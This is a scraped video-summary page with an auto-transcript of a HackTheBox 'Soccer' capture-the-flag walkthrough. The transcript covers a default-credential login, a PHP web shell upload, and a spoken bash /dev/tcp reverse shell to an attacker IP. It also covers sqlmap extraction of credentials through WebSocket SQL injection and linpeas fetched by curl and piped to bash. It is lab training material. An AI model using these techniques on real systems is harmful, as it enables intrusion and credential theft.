HackTheBox - Soccer
00:36:35
https://www.youtube.com/watch?v=V_CkT7xyiCc
摘要
TLDRIn this video, the host, ipsec, conducts a penetration testing walk-through on the 'soccer' machine from Hack The Box. The process begins with using DirBuster to identify a vulnerable file management utility on the server. Default credentials are used to log in and upload a malicious PHP shell, enabling shell access on the server. The next step involves discovering a Boolean-based SQL injection vulnerability within a WebSocket connection, allowing the extraction of database credentials using SQLMap. After gaining SSH access with extracted credentials, the video details various methods for privilege escalation, focusing on exploiting a configured 'doas' command that permits executing the dstat tool for executing custom scripts, ultimately allowing the presenter to gain root access on the machine.
心得
- 🔍 Use DirBuster for directory enumeration.
- 🔑 Log in with default credentials to access file management tools.
- 🛠️ Upload a malicious PHP shell for command execution.
- ⚠️ Exploit Boolean-based SQL injection vulnerabilities.
- 🗃️ Use SQLMap to automate database extraction.
- 📡 Analyze WebSocket connections for vulnerabilities.
- 💻 SSH into the machine with extracted credentials.
- ⚙️ Discover special permissions with 'doas'.
- 📜 Craft a script for privilege escalation with 'dstat'.
- 🚀 Achieve root access through scripted exploits.
时间轴
- 00:00:00 - 00:05:00
In this video, the narrator demonstrates how to exploit an easy Linux machine named "soccer" from Hack The Box. The initial step involves using dirbust to scan the web server and identify the presence of a file management utility. This leads to logging in using default credentials and uploading a PHP shell to gain access to the system.
- 00:05:00 - 00:10:00
After obtaining a shell through the uploaded PHP file, the narrator inspects the web server's second site which uses WebSocket technology. A Boolean-based SQL injection vulnerability is discovered, allowing further database exploitation using SQLMap to dump credentials and access the box via SSH.
- 00:10:00 - 00:15:00
The SSH access reveals that the sudo-like application named "dues" allows the user to execute commands as root. The narrator emphasizes the potential of this application, which paves the way for privilege escalation after exploring the box.
- 00:15:00 - 00:20:00
The narrator conducts Nmap scans, identifying key open ports such as SSH and HTTP. Additionally, they explore the web configurations using Burp Suite, showing how to manage DNS caching issues that can arise when testing the web application.
- 00:20:00 - 00:25:00
The narrative reveals challenges during the exploitation phase, including troubleshooting web requests and establishing connections through Burp Suite. They attempt to enumerate hidden directories and utilize GoBuster to find a path leading to the h3k tiny file manager.
- 00:25:00 - 00:30:00
The next key step involves gaining access to the tiny file manager and uploading a PHP shell for command execution. The narrator demonstrates how to manipulate the commands to fetch a shell with minimal bad characters by using URL encoding.
- 00:30:00 - 00:36:35
Toward the end, the viewer learns about the process of privilege escalation and interacting with a dstat command configured with 'doas'. The final exploitation point allows the narrator to execute their script as root, thus culminating in the successful capture of the root.txt file, completing the box.
显示更多
思维导图
视频问答
What tool is used for directory brute-forcing?
DirBuster is used for directory brute-forcing.
How is the PHP shell uploaded?
The PHP shell is uploaded via a file management utility after logging in with default credentials.
What SQL injection technique is demonstrated?
Boolean-based SQL injection is demonstrated using WebSockets.
How is SQLMap used in the process?
SQLMap automates the extraction of the database by exploiting the SQL injection vulnerability.
What is 'doas' in the context of this video?
'doas' is a BSD command similar to 'sudo' that allows executing commands as another user.
How is the dstat command exploited for privilege escalation?
By placing a script in a writable directory and using 'doas' to execute it, root access is obtained.
查看更多视频摘要
即时访问由人工智能支持的免费 YouTube 视频摘要!
字幕
en
自动滚动:
- 00:00:00what's going on YouTube this is ipsec
- 00:00:01I'm doing soccer from hack the box which
- 00:00:03is a easy Linux machine that starts out
- 00:00:05with just running dirt Buster against a
- 00:00:08website to discover a file management
- 00:00:10utility is installed on the web server
- 00:00:12Googling it finding default credentials
- 00:00:15you can log in upload a PHP shell and
- 00:00:17get a shell on the box with that shell
- 00:00:19you can look at the web server itself
- 00:00:22and discover there is a second version
- 00:00:23of the website this one has some
- 00:00:26websocket technology in it and if you
- 00:00:28intercept the websocket you discover it
- 00:00:30is vulnerable to a Boolean based SQL
- 00:00:34injection so you can use SQL map to
- 00:00:37automate dumping that database get some
- 00:00:39credential to the Box log in with SSH
- 00:00:41and once you start poking around you'll
- 00:00:43discover that sudo you know not pseudo
- 00:00:46but an application like studio called
- 00:00:48dues is configured for your user that
- 00:00:50lets you execute commands as the root
- 00:00:52user so that is how you prevask with
- 00:00:55that being said let's just jump in as
- 00:00:57always we're going to start with and map
- 00:00:58so Dash SC for default all scripts as
- 00:01:00the enumerate versions OA output all
- 00:01:03formats when the nmap directory and call
- 00:01:04it soccer then the IP address of 10 10
- 00:01:0711.194 this can take some time to run so
- 00:01:10I've already ran it looking at the
- 00:01:12results we have just three ports open
- 00:01:14the first one being SSH on Port 22 from
- 00:01:17the banner we can see it's a new Ubuntu
- 00:01:19Server we also have HTTP open on Port
- 00:01:2280. it is running engine X also on
- 00:01:25Ubuntu and it is telling us it is
- 00:01:27forwarding all requests to soccer.hdb so
- 00:01:30we should add that to the host file
- 00:01:31right now but I'm going to hold off a
- 00:01:33bit just because I want to show a little
- 00:01:34burp sweet DNS caching thing that I've
- 00:01:36seen a lot of people complain about so
- 00:01:38we'll just show that
- 00:01:39um a little scenario in a minute we also
- 00:01:42have Port 1991 open burp Suite doesn't
- 00:01:44know what it is but based upon this
- 00:01:46request I'm going to say this is an HTTP
- 00:01:50server or just a web server right
- 00:01:53um and here's the page it's sending back
- 00:01:55it's a 404 page and I see this pre
- 00:01:58cannot get slash pre I'm gonna guess
- 00:02:00this ID node.js just because I've seen
- 00:02:02this so much with node.js things we
- 00:02:05could go over to Google and Google this
- 00:02:07and the first result is node.js the
- 00:02:09second result is node.js third and
- 00:02:11fourth no JS so I'm gonna guess it's
- 00:02:14node.js I want to say like Googling
- 00:02:16fiber may also use this but I don't
- 00:02:18think it puts the pre before and after
- 00:02:20it but um node.js is definitely going to
- 00:02:23be the most common one so since this is
- 00:02:25a web server we don't really have
- 00:02:27anything there um we could try hitting
- 00:02:29it so if we went to 10 10 11 194 was it
- 00:02:3390 91
- 00:02:34uh we just get that cannot get page and
- 00:02:37then if we go to
- 00:02:40um the actual box I want to make sure
- 00:02:41I'm going through burp Suite so I set
- 00:02:43rep Suite on intercept is off but it
- 00:02:45still goes through this tool
- 00:02:47it's going to redirect us to soccer.hdb
- 00:02:50and we got this and at this point Java
- 00:02:53is going to Cache the DNS so even if we
- 00:02:55add soccer.hdb here so 10 10 11 194
- 00:02:59soccer.htb
- 00:03:01refresh this it's still gonna resolve to
- 00:03:05nothing
- 00:03:06um it's super annoying I don't know
- 00:03:08exactly how to clear the cache it clears
- 00:03:09eventually but I can take burp Suite off
- 00:03:12we get here I put burp sweet back on uh
- 00:03:15it's gonna go back to the error page
- 00:03:16right so if you get that
- 00:03:18um just take rip Suite off play around
- 00:03:20with the site a little bit and then go
- 00:03:21back to brip suite and you will be fine
- 00:03:23so looking at this it looks like it is a
- 00:03:27football club we have this we love
- 00:03:29soccer thing here and some news and
- 00:03:31clicking around we can't really get to
- 00:03:33any page I'm going to press Ctrl U to go
- 00:03:36to the source and what I'm looking at
- 00:03:37here is if we can see what this page is
- 00:03:41built with is this like a WordPress do I
- 00:03:43see WP Dash do I see Joomla this just
- 00:03:46looks like some type of static site
- 00:03:48um there are jpegs we could look at like
- 00:03:51the metadata but I'm not seeing anything
- 00:03:54too interesting here
- 00:03:57um
- 00:03:57I wonder if the HTML is broken because
- 00:04:00that style is written I don't see like a
- 00:04:03um
- 00:04:04style up here so I think
- 00:04:06just a bad clone of it or maybe that's
- 00:04:08supposed to be this but
- 00:04:11I don't really get anything from it I
- 00:04:13don't see any unique like JavaScript
- 00:04:15files to go down so we can either try
- 00:04:17like virtual host enumeration or Dura
- 00:04:20busting and I'm just going to do dirt
- 00:04:21busting in this case but you should
- 00:04:22probably do both and I'm going to do go
- 00:04:24Buster dir Dash U saka.hdb then we'll do
- 00:04:28opt sex list
- 00:04:31um
- 00:04:32what is it
- 00:04:34let's see discovery
- 00:04:37web content then
- 00:04:41uh Rat small words dot text
- 00:04:49and let's see if we get any hits right
- 00:04:51off the bat
- 00:04:52uh while that goes we probably could
- 00:04:54identify if this is HTML or PHP I didn't
- 00:04:57really do that just because it was nginx
- 00:04:59I really see.php on nginx but while good
- 00:05:03Buster runs we can track index.html
- 00:05:05index whoops dot PHP
- 00:05:09uh only HTML comes back so it's probably
- 00:05:12going to be just a static site we still
- 00:05:15don't have any hits on Go Buster we can
- 00:05:18check if our brip sweets cleared the
- 00:05:20cash yet it looks like it has as now we
- 00:05:23can hit this page but I'm gonna wait for
- 00:05:26Go Buster to finish and now that it's
- 00:05:29complete we can see there was a page on
- 00:05:32Tiny so let's go take a look at what
- 00:05:35this URL and going to it we get h3k the
- 00:05:39tiny file manager so we can just try to
- 00:05:41log in with admin password
- 00:05:44um looks like invalid username password
- 00:05:46we can try Googling this so I'm going to
- 00:05:48go h3k tiny file manager
- 00:05:52and let's see
- 00:05:55we have a remote code execution exploit
- 00:05:58there
- 00:05:59I'm guessing there's going to be some
- 00:06:00random application on GitHub
- 00:06:04and we have it here as well if we look
- 00:06:06at this exploit
- 00:06:08let's see exactly what it's doing it's
- 00:06:10looking for JQ
- 00:06:12um it wants username and password so we
- 00:06:16need it
- 00:06:17it's giving us the password of admin at
- 00:06:19one two three I'm guessing this is going
- 00:06:21to be the default if it put it in there
- 00:06:24default username password according this
- 00:06:27admin admin at 123 and user12345 so
- 00:06:30let's try both of these so we can try
- 00:06:32admin
- 00:06:34and then this password
- 00:06:36and we get logged in
- 00:06:39so since we are at a file manager it's
- 00:06:41probably got a way to upload files I'm
- 00:06:44just going to go into the uploads
- 00:06:46directory
- 00:06:47and then
- 00:06:49hit upload and I'm going to drop a PHP
- 00:06:52file here so I'm just going to do V
- 00:06:54it'll call it show.php
- 00:06:57and then we'll do system
- 00:07:00request
- 00:07:03um and I'll give the parameter the name
- 00:07:05of CMD
- 00:07:08and let's see
- 00:07:10let us go to a place that we can drag
- 00:07:12and drop it or maybe we can just click
- 00:07:13on it yeah we can so I'm going to do
- 00:07:18hdb
- 00:07:19uh the Box's name was soccer
- 00:07:23and let's try uploading show.php and see
- 00:07:25what happens
- 00:07:26it looks like it just uploaded I was
- 00:07:29expecting it to say like this file type
- 00:07:30is not allowed or something so let's go
- 00:07:33take a look at it so if I go to Tiny it
- 00:07:37was uploads after that and then
- 00:07:39shell.php
- 00:07:41it looks like we can execute I'm going
- 00:07:43to do question mark CMD
- 00:07:45is equal to who am I
- 00:07:47and we get www data so let's just go and
- 00:07:50get a shell I'm going to turn my burp
- 00:07:52Suite on to intercept just because it's
- 00:07:54easier to do it
- 00:07:56um in the well not repeat or tab but
- 00:07:58just as a post request because you have
- 00:07:59less Bad characters to worry about so if
- 00:08:02we change the request method to a post
- 00:08:04then we can just do Bash
- 00:08:07Dash C
- 00:08:08then bash Dash I Dev TCP 10 10 14 8 9001
- 00:08:14zero and one like that and then
- 00:08:16highlight it Ctrl U to URL encode it
- 00:08:19mainly the bad character is going to be
- 00:08:21these ampersands or and signs because
- 00:08:23that's also going to be the like
- 00:08:25parameter separator and HTML so that's
- 00:08:29why we URL encode it
- 00:08:31so now I can do NC lvnp 9001 send this
- 00:08:35request
- 00:08:36and we get phone not found
- 00:08:39I'm going to re-upload the file just in
- 00:08:41case something got deleted
- 00:08:45so refresh this page
- 00:08:47upload shell.php
- 00:08:50send it it's hanging because we have the
- 00:08:53shell here
- 00:08:54so let's do python3-c
- 00:08:57import PTY PTY spawn Ben Bash
- 00:09:03sdty raw minus Echo FG enter enter and
- 00:09:08then export term is equal to X terms so
- 00:09:11now we can clear the screen so now the
- 00:09:13first thing I'm wondering is exactly
- 00:09:15what is on Port
- 00:09:169091 if you're a member from our initial
- 00:09:20thing if we went to soccer hdb 1991
- 00:09:23it just says cannot get slash right but
- 00:09:26now we can actually see what that like
- 00:09:28node.js application is so I'm going to
- 00:09:30do SS lntp we can see it is running here
- 00:09:34we don't have a PID so I don't know
- 00:09:36exactly what it is if I do PS Dash EF
- 00:09:39dash dash Forest we don't see that much
- 00:09:43we only see our processes
- 00:09:46um and that's because I'm guessing Etsy
- 00:09:48f-stab we have hide PID is equal to 2
- 00:09:51which just means you can't see the
- 00:09:53processes from another user we look at
- 00:09:55the slash proc directory you'll notice
- 00:09:57there's a lot less numbers in proc
- 00:09:59because we just don't have access to it
- 00:10:01so we can't enumerate 1991 based upon
- 00:10:05the process so I'm going to go over to
- 00:10:07like the engine X config so if we do
- 00:10:10sites Dash enabled we can see default
- 00:10:15and this is going to be the engine X
- 00:10:16config for soccer.hdb it's just invert
- 00:10:20www.html
- 00:10:22and then there is a sock player.hdb so
- 00:10:27let's take a look at this this is
- 00:10:28listening on Port 80.
- 00:10:31um it's DNS name is sockplayer.socca.hdb
- 00:10:35and it's going to do a proxy pass to
- 00:10:38localhost 3000 which is not 1991 that's
- 00:10:42something different but it's a different
- 00:10:45um application I don't know exactly what
- 00:10:47this is so let's go add sockplayer.hdb
- 00:10:52to our host file so I'm going to do sudo
- 00:10:54VI Etsy host
- 00:10:57add this
- 00:10:59and then in a browser let's go to
- 00:11:03sockplayer.socca.hdb and this looks very
- 00:11:06similar to just soccer.hdb
- 00:11:09the only difference is we have a few
- 00:11:11more functions in this navigation bar
- 00:11:13where we only had home here
- 00:11:15we have home match login
- 00:11:19and sign up so we can try logging in
- 00:11:22with let's say admin
- 00:11:24soccer.hdb password of password
- 00:11:28and we get incorrect email or password
- 00:11:31I'm going to try signing up so let's do
- 00:11:34root ipsec.rocks
- 00:11:37username of ipsec password of password
- 00:11:40and let's try logging in
- 00:11:45okay
- 00:11:47and it says your ticket ID is 69330 we
- 00:11:51have 10 days reminding for the match the
- 00:11:53price is free I don't know exactly what
- 00:11:55to put in here I'll put lead and we say
- 00:11:57ticket does not exist I'm going to put
- 00:12:00this and ticket does exist so this looks
- 00:12:03like just
- 00:12:05some Boolean enumeration type thing 29
- 00:12:08doesn't exist if we do or one equals one
- 00:12:11like this and a comment
- 00:12:13uh we get ticket does not exist let's
- 00:12:15get rid of the single quote and oh
- 00:12:17ticket does exist let's do and two
- 00:12:20equals one doesn't exist so we have a
- 00:12:23standard SQL injection in this field so
- 00:12:27let's Taiwan bibsweet real quick let's
- 00:12:30make sure intercept is on
- 00:12:32and or send this request
- 00:12:34and when I hit enter
- 00:12:37it's not going to brip Suite we have
- 00:12:39ticket exist nothing
- 00:12:42um so let's press F12
- 00:12:45and see what happens on this repeater
- 00:12:47tab
- 00:12:51that's just a keep alive
- 00:12:54I'm not saying anything let's just I
- 00:12:56guess refresh the page
- 00:13:00add Gateway
- 00:13:02please log in I guess we have to create
- 00:13:04the account again
- 00:13:08let's see
- 00:13:09check dot rocks password
- 00:13:13uh ipsec password
- 00:13:20log in
- 00:13:29so ticket exist if we intercept
- 00:13:32let's do two equals one
- 00:13:34now it is
- 00:13:35and we're getting a websocket so
- 00:13:39um I think when you intercept a
- 00:13:41websocket connection you have to make
- 00:13:43sure you intercept the connection
- 00:13:44request too so you can't just toggle it
- 00:13:46on in middle of the page and then
- 00:13:47intercept it you have to start
- 00:13:49intercepting from the very beginning
- 00:13:51so that's probably why we weren't seeing
- 00:13:53it beforehand the other thing to keep in
- 00:13:55mind is always go to proxy settings
- 00:13:58and there is websocket right here to
- 00:14:01make sure you intercept that but now we
- 00:14:03have discovered it is using websockets
- 00:14:06and if I just send the request
- 00:14:09um I'm not getting a response back we
- 00:14:10see the direction is to server
- 00:14:13so what I'm actually going to do
- 00:14:16is click this to disconnect
- 00:14:19I'm going to reconnect to this websocket
- 00:14:21and then send it and now we get ticket
- 00:14:23does not exist so we had to re-establish
- 00:14:26the websocket stream as well in the
- 00:14:28repeater window websockets are funny
- 00:14:32um and don't always work as you'd expect
- 00:14:34but now that we have this
- 00:14:37um
- 00:14:38we need to get this over into like SQL
- 00:14:41map or something because this is a
- 00:14:44Boolean injection right I don't want to
- 00:14:46manually do all of this by hand because
- 00:14:50we're just getting it like one character
- 00:14:52at a time not even that we're checking
- 00:14:53if one character exists at a time that's
- 00:14:55going to take a long time to do in this
- 00:14:58repeater window if you want to know more
- 00:15:00about Boolean injection I'm sure if you
- 00:15:01go to ipsec.rocks and type Boolean
- 00:15:03injection
- 00:15:04um you'll probably hear me talk more
- 00:15:06about it where we actually build like
- 00:15:07Python scripts to do it manually but
- 00:15:10um we don't have to do that every time
- 00:15:13right but like explaining Boolean
- 00:15:15injection I'd probably go to one of
- 00:15:17these videos
- 00:15:20so let's just try getting this over into
- 00:15:24um SQL map so I'm going to copy it to a
- 00:15:27file I'm going to say injection dot SQL
- 00:15:30or what do you request
- 00:15:32save it
- 00:15:35and then we can cat
- 00:15:37uh what do we call it injection.request
- 00:15:40and we don't have any data about this so
- 00:15:43SQL maps not going to know how to deal
- 00:15:45with this if we just give it like the
- 00:15:46dash R to read parameter file right so
- 00:15:49what I'm going to try doing is SQL map
- 00:15:52Dash U
- 00:15:53and we can say WS colon slash slash
- 00:15:58sock plant let's see
- 00:16:01it's a websocket
- 00:16:03sockplayer.htb 9091
- 00:16:07like this is this going to work
- 00:16:11um
- 00:16:11a better way to do this is going to be
- 00:16:13using application called WS cat
- 00:16:15so we can do WS cat first Dash C
- 00:16:19sockplayer.htb 9091
- 00:16:22uh uh entry not found
- 00:16:26not found
- 00:16:29let's see
- 00:16:34oh um
- 00:16:36dot soccer Dot hdb there we go
- 00:16:40so I want to send this real quick
- 00:16:45take it exist
- 00:16:47okay
- 00:16:49so that is a valid thing for a websock
- 00:16:51and I wonder if I needed that slash WS
- 00:16:55I don't think I did a lot of web sockets
- 00:16:58may have slash WS on it or not but it
- 00:17:00doesn't look like I need to we just need
- 00:17:02to make sure
- 00:17:04we put the soccer.hdb here
- 00:17:08there we go
- 00:17:10and then
- 00:17:12how do we do payload in SQL map uh man
- 00:17:16SQL map I think it's Dash D yeah Dash D
- 00:17:19for data
- 00:17:22and what we're going to do
- 00:17:25is just put star and what star is going
- 00:17:27to do is manually tell SQL map
- 00:17:31um this is where we want to inject
- 00:17:33then we can do dash dash batch
- 00:17:38uh let's see D is incompatible with you
- 00:17:42so let's see exactly what D was I
- 00:17:45thought it was data
- 00:17:50uh dash dash data is what I want
- 00:17:54let's try dash dash data
- 00:17:58there we go that works and all batch
- 00:18:00mode is going to do is auto submit um
- 00:18:02the default for everything so
- 00:18:05um
- 00:18:06found in Paris by do you want to process
- 00:18:07it yes Json data do you want to process
- 00:18:09it yes whatever but it's just going to
- 00:18:12answer all the questions so we can just
- 00:18:14let SQL map go on its own right so here
- 00:18:18it is going to be testing for various
- 00:18:20things and hopefully it ends up finding
- 00:18:23something and I want to see exactly
- 00:18:25while that goes
- 00:18:27um actually we can do it like this
- 00:18:31let's see actually
- 00:18:34postpram does not appear to be
- 00:18:36injectable
- 00:18:42let's take batch mode off
- 00:18:45custom injection do you want to process
- 00:18:47yes
- 00:18:49yes
- 00:18:50that's what we did
- 00:18:52um
- 00:18:54let's see
- 00:18:59if we do technique equals B for Boolean
- 00:19:03and risk three level five
- 00:19:09let's do batch mode again
- 00:19:19see dbms
- 00:19:22trying to figure out what Dash D is I
- 00:19:24don't think it's DB maybe it is
- 00:19:34I'm not exactly sure what just Dash
- 00:19:36lowercase D was and why it wasn't
- 00:19:38compatible with the you it's definitely
- 00:19:40not like databases to enumerate
- 00:19:43but it must be something
- 00:19:46so let's see if it finds it now with the
- 00:19:48risk and level set a bit higher I'm just
- 00:19:51gonna pause the video and resume when
- 00:19:53SQL map is done and it looks like that
- 00:19:56did the trick we have a Boolean based
- 00:19:58blind injection SQL map so now we can do
- 00:20:01dash dash DBS to get a list of the
- 00:20:05databases and then after that we can
- 00:20:07specify
- 00:20:09um
- 00:20:10the dump feature right and the whole
- 00:20:12reason why I'm doing dash dash DBS is I
- 00:20:15don't want to dump like information
- 00:20:17schema and everything like that because
- 00:20:18you can see how slow this is actually
- 00:20:21going if we dumped all the every
- 00:20:24database which is five in this case
- 00:20:28um we'd be here for much longer than
- 00:20:30nmap takes to run right we can see
- 00:20:33exactly how slow this is going we can
- 00:20:34probably speed this up with dash dash
- 00:20:36threads 10. let's see
- 00:20:39if this speeds it up any
- 00:20:42so we got five
- 00:20:44there we go and you know it's threaded
- 00:20:46now because
- 00:20:48we have
- 00:20:49um
- 00:20:51like these underscores here and it gets
- 00:20:54multiple simultaneously so
- 00:20:57um there's going to be 10 different
- 00:20:58underscores whenever it knows the length
- 00:21:00it wants to get or 10 that works
- 00:21:03simultaneously so this is probably 10 as
- 00:21:04we see 10 18 and that does the other
- 00:21:06ones right so this is going much quicker
- 00:21:09this one is length of three of course
- 00:21:12that's going to be CIS length of nine
- 00:21:16um
- 00:21:17soccer underscore DB so that's the
- 00:21:19database we want so instead of DBS
- 00:21:24we can specify the dash capital D flag
- 00:21:26Saco DB dash dash dump we could also
- 00:21:31like dump a list of all the tables and
- 00:21:33then go fetch the exact table we want
- 00:21:36that may be the better way to go about
- 00:21:38this but
- 00:21:40um I'm assuming there's not much
- 00:21:41information in this table right so we
- 00:21:44have accounts there are I guess four
- 00:21:46accounts the first one is a length of
- 00:21:49five
- 00:21:50so oh four uh columns and accounts so we
- 00:21:54got email ID let's see the next one is
- 00:21:57eight
- 00:21:59um username
- 00:22:00password okay
- 00:22:02um eight here is this one going to be
- 00:22:04username
- 00:22:06yes
- 00:22:07so now it's going to dump the first one
- 00:22:09there is one account
- 00:22:1117 letters so this is probably going to
- 00:22:14be an email player at
- 00:22:18player.htb
- 00:22:19the next is four characters
- 00:22:23one three two four I think that was the
- 00:22:25ID
- 00:22:2720 is going to be a password
- 00:22:30and it's in plain text so we have player
- 00:22:33of the match 2022.
- 00:22:37and then the username of player
- 00:22:41so this is definitely the password where
- 00:22:43it's telling us right here what goes to
- 00:22:44what
- 00:22:46um
- 00:22:46we just got a username and password to
- 00:22:49this application we can try logging into
- 00:22:51the app so if I go back here let's log
- 00:22:54out
- 00:22:55login
- 00:22:57player at player.htb
- 00:23:01player of the match
- 00:23:03and we don't have any like extra
- 00:23:04functionality I was expecting like a
- 00:23:06slash admin or something here right but
- 00:23:09we don't exactly have anything these
- 00:23:12links don't go live so let's go back to
- 00:23:16Earth shell and a cat Etsy pass WD grip
- 00:23:20for everything that ends in sh because
- 00:23:22there's going to be shells and we do
- 00:23:24have a username called player so maybe
- 00:23:28we can just SSH with this password so
- 00:23:30I'm going to do SSH player at 10 10 11
- 00:23:34194 I think with soccer
- 00:23:37yes
- 00:23:39put in this password
- 00:23:42and we get logged in and that's where
- 00:23:45user.txt is
- 00:23:47so we can look at the PS output again to
- 00:23:49see if we see anything other but again
- 00:23:51since we can only see our own processes
- 00:23:53there's not much here and now we don't
- 00:23:56have any questions because we know
- 00:23:58exactly what 1991 goes to I guess we
- 00:24:00could see if we can interact with this
- 00:24:02application I do lsla here I don't see
- 00:24:04anything we could do a fine slash
- 00:24:08um Dash user player output errors to Dev
- 00:24:11null see if there's anything else here
- 00:24:15um let's get rid of
- 00:24:18proc
- 00:24:20and run
- 00:24:24and see if we have anything else uh we
- 00:24:26need a grep dash V to remove them
- 00:24:30we can also remove anything that begins
- 00:24:32with CIS
- 00:24:37and there's really
- 00:24:38nothing owned by player we can check our
- 00:24:41groups and we're also in the group
- 00:24:42called player and do this so we do group
- 00:24:45Player
- 00:24:47and
- 00:24:48we have actually I did not expect this
- 00:24:51user shared d-stat so if I look at this
- 00:24:55it is a directory
- 00:24:58that we can I guess write to but I don't
- 00:25:01know exactly what dstat is so
- 00:25:05let's do find Dash name dstat
- 00:25:09pipe to errors
- 00:25:13we have dstat here let's do pseudo-l uh
- 00:25:17password for player that was in
- 00:25:21where was that that was SQL map and
- 00:25:25that is long gone
- 00:25:27or is it we can go to CD dot
- 00:25:30um is it config SQL map
- 00:25:33let's see
- 00:25:35escrow map breaks somewhere
- 00:25:38local share
- 00:25:43okay so let's see SQL map
- 00:25:48history
- 00:25:50let's go in output
- 00:25:53we can go to Sock player
- 00:25:57and then
- 00:25:59dump
- 00:26:01CD soccer DB CAD accounts we finally got
- 00:26:05the player and this is why you should
- 00:26:07always take notes when doing things
- 00:26:08because even though we can still pull it
- 00:26:10out that probably took like two minutes
- 00:26:12of time if I just took notes we would
- 00:26:14have saved it and we can't run anything
- 00:26:16with it
- 00:26:18um we can run stat against d-stat and
- 00:26:20see exactly what this application is
- 00:26:24if we have like set uid or anything
- 00:26:26against it
- 00:26:27doesn't look like we do it's just zero
- 00:26:29seven five five with no
- 00:26:32um special bits
- 00:26:34so
- 00:26:36let us go over to Lynn piece so GitHub
- 00:26:40lint piece and see if this tells us
- 00:26:43anything and the things we want to home
- 00:26:44in on is like dstat and things like that
- 00:26:48just because
- 00:26:50um it's Unique to this group right
- 00:26:52so let's download lynnps.sh
- 00:26:57Ave it to a file
- 00:27:01let's go it's going to exit reopen this
- 00:27:08move downloads uh what was it limpys.sh
- 00:27:12here python3 Dash m
- 00:27:16HTTP server
- 00:27:18girl 10 10 14 8 8
- 00:27:20000
- 00:27:21lynnps.sh pipe over to bash and I'm
- 00:27:25going to pause the video and just let
- 00:27:27this run and we'll see what it returns
- 00:27:30so now that Lin piece is done we can
- 00:27:32just go to the top and scroll down and
- 00:27:36oh my God that is a lot highlighted
- 00:27:39um
- 00:27:41there we go I don't know what I did
- 00:27:43there
- 00:27:44but that looks better so I'm just going
- 00:27:47to go down when I see red that catches
- 00:27:49my eye I may look into it more the
- 00:27:52pseudo version thing
- 00:27:54um I don't know why it always highlights
- 00:27:55and red I think it's just a bad regex
- 00:27:57because the pseudo vulnerability it's
- 00:28:00referencing I think came out like two or
- 00:28:01three years ago so you probably wouldn't
- 00:28:03see that on a box
- 00:28:06um here it is in the Linux exploit
- 00:28:08suggestion 2021 so yeah two to three
- 00:28:10years ago and I've kind of got
- 00:28:12desensitized to
- 00:28:15um any type of Kernel exploits from
- 00:28:16limpy's just because it's not always
- 00:28:19kept up to date so
- 00:28:21um I always see red there and then I
- 00:28:24just take note of it and go back to it
- 00:28:25if I don't see anything else and that's
- 00:28:28like a last resort right because
- 00:28:31um it's the boy that cried wolf right it
- 00:28:33always says it's vulnerable I always try
- 00:28:35it and it really is
- 00:28:37so just keep going down the list looking
- 00:28:39at when things are red analyzing dot
- 00:28:42socket files
- 00:28:43um I'm not exactly sure off top my head
- 00:28:45how I would exploit this it would
- 00:28:47require more research which means I'm
- 00:28:49just going to keep going down the list
- 00:28:50and just put down the note I probably
- 00:28:52look at the socket files before I look
- 00:28:54for kernel privest just because I think
- 00:28:56that's a bit safer to do whenever you do
- 00:28:59like uh kernel previous like that you
- 00:29:01risk crash in the box so it's always a
- 00:29:03last resort thing right
- 00:29:05so active ports we kind of have an idea
- 00:29:08of the ports um there is my sequel I
- 00:29:10don't think we've actually logged into
- 00:29:12the database yet but you can probably
- 00:29:14get the credentials to my sequel with
- 00:29:15this player account if the web app is
- 00:29:18running there or something right
- 00:29:20um
- 00:29:22last logins not that interesting useful
- 00:29:24software on the box that's just like so
- 00:29:27we can live off the land
- 00:29:28um I don't see anything highlighted in
- 00:29:30red here PHP exec extensions
- 00:29:34um
- 00:29:35well we already had a shell as probably
- 00:29:38www data which would be what nginx is
- 00:29:40running as so being able to drop like a
- 00:29:43PHP file in this directory and execute
- 00:29:45it not really that interesting to me
- 00:29:47unless root was executing these files
- 00:29:49right but I don't think that was the
- 00:29:52case
- 00:29:54um
- 00:29:55much more just web configuration
- 00:29:58uh fast CGI files or sync files
- 00:30:02SSH Keys these are all public so that's
- 00:30:06public knowledge not that interesting to
- 00:30:07me
- 00:30:09uh shd config
- 00:30:12hostile Pam auth
- 00:30:16uncommon pass WD files not really that
- 00:30:19interesting
- 00:30:25my sequel
- 00:30:27uh there is a bash RC file not
- 00:30:29interesting though
- 00:30:30files with interesting permissions I see
- 00:30:34one I don't recognize right off the bat
- 00:30:35it's not highlighted in red but this is
- 00:30:37one of those sections I always look at
- 00:30:39and if you don't want to always like
- 00:30:41have to run lint piece to do this you
- 00:30:43can do it with a simple find command but
- 00:30:45use a local Den do as
- 00:30:47um two things stand out to me I don't
- 00:30:49know exactly what do as is but this is
- 00:30:52also running in local right and local is
- 00:30:55meant to be a place where like the
- 00:30:56package manager doesn't drop it that's
- 00:30:58where the administrator specifically
- 00:31:00puts binaries in these type of
- 00:31:02directories the local directories so
- 00:31:05um
- 00:31:06I would guess that
- 00:31:09um this is unique to this box right or
- 00:31:13maybe not unique in the sense that
- 00:31:15you'll never see it again but it's
- 00:31:17something specifically configured on
- 00:31:19this box as a set uid file which is
- 00:31:21interesting right if you wanted to find
- 00:31:23it without Lin peas you could just do
- 00:31:25like fine slash Dash perm
- 00:31:28-4002 devnoll I think we'll find it I'm
- 00:31:32also going to add a dash LS so he's show
- 00:31:34permissions
- 00:31:37um let's see and we see do as right here
- 00:31:40right
- 00:31:42so if we look at do as so man do as
- 00:31:47it executes command as another user and
- 00:31:49I've done a lot of BSD thing well
- 00:31:51it is a BSD um command
- 00:31:54um do as like the BSD version of sudo
- 00:31:56right so I'm going to see if I can find
- 00:31:59a config for do as so we'll do find
- 00:32:02slash Etsy grep for do as
- 00:32:06we don't find anything let's just find
- 00:32:08slash grep do as and we will pipe errors
- 00:32:13to Dev null
- 00:32:16so there is a user local Etsy duos.com
- 00:32:19that sounds good to me let's take a look
- 00:32:22at it we see permit no password player
- 00:32:26as root and the command is dstat so
- 00:32:30finally us having access to that dstat
- 00:32:33directory is starting to make sense
- 00:32:36um I know we looked at dstat
- 00:32:37specifically that was our group right
- 00:32:39sign slash Dash group player to devno
- 00:32:46it was with all the greps so if we
- 00:32:49remove proc run and CIS
- 00:32:53we can see we can write to use a share
- 00:32:55d-stat
- 00:32:58so if we do man on dstat we can kind of
- 00:33:01see what it is
- 00:33:08let's see
- 00:33:11we'd have to read this entire thing but
- 00:33:13I think it executes Python scripts
- 00:33:15mainly right
- 00:33:18let's just execute dstat
- 00:33:23dash dash help
- 00:33:26is there a plugin option
- 00:33:31let's do dash dash list
- 00:33:35so dstat is listing all the plugins we
